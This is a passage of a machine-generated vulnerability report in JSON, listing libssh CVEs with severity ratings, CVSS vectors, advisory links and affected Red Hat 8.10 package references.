          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18160.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0966.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0966"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0966"
        },
        {
          "url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2026-0966.txt"
        }
      ],
      "published": "2026-03-26T21:17:00+00:00",
      "updated": "2026-06-17T10:11:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0967",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.2,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1333
      ],
      "description": "A flaw was found in libssh. A remote attacker, by controlling client configuration files or known_hosts files, could craft specific hostnames that when processed by the `match_pattern()` function can lead to inefficient regular expression backtracking. This can cause timeouts and resource exhaustion, resulting in a Denial of Service (DoS) for the client.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0967"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0967"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18160.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0967.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0967"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0967"
        },
        {
          "url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2026-0967.txt"
        }
      ],
      "published": "2026-03-26T21:17:00+00:00",
      "updated": "2026-06-17T10:11:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0968",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "A flaw was found in libssh in which a malicious SFTP (SSH File Transfer Protocol) server can exploit this by sending a malformed 'longname' field within an `SSH_FXP_NAME` message during a file listing operation. This missing null check can lead to reading beyond allocated memory on the heap. This can cause unexpected behavior or lead to a denial of service (DoS) due to application crashes.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0968"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0968"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18160.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0968.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0968"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0968"
        },
        {
          "url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2026-0968.txt"
        }
      ],
      "published": "2026-03-26T21:17:01+00:00",
      "updated": "2026-06-17T10:11:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
